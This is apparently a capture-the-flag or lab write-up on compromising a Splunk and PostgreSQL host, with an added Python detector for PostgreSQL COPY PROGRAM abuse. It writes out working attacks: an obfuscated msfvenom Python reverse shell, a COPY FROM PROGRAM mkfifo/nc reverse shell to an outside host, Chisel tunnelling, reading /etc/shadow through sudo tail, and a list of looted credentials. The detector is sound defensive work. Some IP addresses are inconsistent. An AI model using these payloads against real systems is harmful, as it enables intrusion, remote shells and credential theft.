10.110.1.123
Enumeration
- Port 8000 and port 8089 were running Splunk services.
- The Splunk installation on this machine was running a trial version, which meant that once the trial expired there was no need to enter a username and password: one could log straight into the system.
After googling a bit I came across the Splunk shell ^935c93
Exploitation
- To get a reverse shell on the machine, one needed to upload an app downloaded from the GitHub repo mentioned above.
- Once uploaded in .gz format, change the permission to "all app", then go to the search field and enter the following command:
| revshell std 10.10.15.149 4444
The obtained reverse shell was not interactive, so to get an interactive shell a new reverse-shell Python payload was generated with msfvenom:
msfvenom -p cmd/unix/reverse_python LHOST=10.10.15.149 LPORT=1234 R
python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqFkN8LgjAQx/+V2NMEmc7sIWIPEgYRFaTvomuhZLvhzf8/lhs9ehzcr8/dF274GJjsBkG+ld38LMa5MxNIhegb4JNDD2gF4SlzvmM83xM/cVcEz7a5r1EsJ9kSqK+KU3O+lXUQWprV/XhpqvpRFtcorDMJWitpKXWannciUUAA2XM2GUX2GkalgfpBnK4SfJXIAmHE/xtMtuNISdINOula7En0BYiDVuU=')[0])))"
Post Exploitation
- Various system information was gathered, such as user information (id, sudo -l, cat /etc/passwd), system information (ifconfig, ip a, uname -a) and open ports (ss -anp).
- Looking at the output of the netstat command, it was realized that there was a postgres service running which could only be accessed from localhost.
- To access the port from the Kali machine, Chisel was used, and once the postgres service could be reached, the following blog was used to get the reverse shell:
https://medium.com/r3d-buck3t/command-execution-with-postgresql-copy-command-a79aef9c2767
proxychains psql -h 127.0.0.1 -p 5432 -U 'postgres'
CREATE TABLE shell(output text);
postgres=# COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.149 2020 > /tmp/f';
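The COPY FROM PROGRAM step above is exactly what a defender would want to alert on. As an added example that is not part of this write-up, the following Python scans PostgreSQL statement logs (log_statement = 'all', default-style line prefix) for COPY ... FROM/TO PROGRAM and reports which role issued which shell command; the log lines are constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed PostgreSQL log excerpt (log_statement = 'all', timestamp/pid/user@db
# prefix); not a capture from the lab machine.
SAMPLE_LOG = """\
2024-01-01 10:00:01 UTC [1201] postgres@postgres LOG:  statement: SELECT version();
2024-01-01 10:00:05 UTC [1201] postgres@postgres LOG:  statement: CREATE TABLE shell(output text);
2024-01-01 10:00:09 UTC [1201] postgres@postgres LOG:  statement: COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.149 2020 > /tmp/f';
2024-01-01 10:00:20 UTC [1202] app@inventory LOG:  statement: COPY items FROM '/var/lib/postgresql/items.csv' CSV;
2024-01-01 10:00:31 UTC [1201] postgres@postgres LOG:  statement: copy shell to program 'id';
"""

# One log line: timestamp, backend pid, user@database, logged statement.
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<ident>\S+) LOG:\s+statement: (?P<stmt>.*)$"
)
# COPY ... FROM|TO PROGRAM '<command>'; keyword case is not significant in SQL.
COPY_PROGRAM_RE = re.compile(
    r"\bCOPY\b.*?\b(?P<dir>FROM|TO)\s+PROGRAM\s+'(?P<cmd>(?:[^']|'')*)'",
    re.IGNORECASE | re.DOTALL,
)


@dataclass
class Finding:
    line_no: int
    timestamp: str
    pid: str
    ident: str        # user@database that issued the statement
    direction: str    # FROM: program output read into a table; TO: table piped into a program
    command: str      # the shell command PostgreSQL hands to /bin/sh


def find_copy_program(log_text: str) -> list[Finding]:
    """Return every COPY ... PROGRAM statement in the log, in file order."""
    findings = []
    for no, line in enumerate(log_text.splitlines(), start=1):
        m = LINE_RE.match(line)
        if not m:
            continue
        hit = COPY_PROGRAM_RE.search(m["stmt"])
        if hit:
            findings.append(Finding(no, m["ts"], m["pid"], m["ident"],
                                    hit["dir"].upper(), hit["cmd"].replace("''", "'")))
    return findings


if __name__ == "__main__":
    for f in find_copy_program(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.ident} (pid {f.pid}) COPY {f.direction} PROGRAM -> {f.command!r}")
```

A plain file COPY (line 4 of the sample) is not flagged; only statements that invoke PROGRAM, which require superuser or the pg_execute_server_program role, are reported.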
Once I had the shell as the postgres user, I ran the LinPEAS script again and went through its output. In the output, I noticed that the user could execute the tail command as root via sudo.
I then did a quick search on GTFOBins and used the command listed there to read files that required root access.
Based on the contents of /etc/passwd and /etc/shadow, I tried credential theft and password-cracking tools, but was only able to crack the password of the user mark (mark:toor).
I then looked for the .ssh files of the root user and found the .ssh private key, which I used to get a shell as root over SSH.
ssh root@10.10.110.123 -i id_rsa
./chisel server -p 8000 --reverse
./loot client 10.10.15.149:8000 R:socks
Once in the root shell, I continued post-exploitation and obtained the password for the postgres user, which was root.
Running the netstat command again, I realized that there was a connection between the machines .30 and .23.
I then used tcpdump to capture the network traffic between the two hosts and obtained the following information.
Final Loot
- mark:toor
- postgres:root
- SSH key for the root user
- admin:Zaq12wsx! for the machine .30
Three flags: 1 for Mark, 2 for Postgres and 3 for Root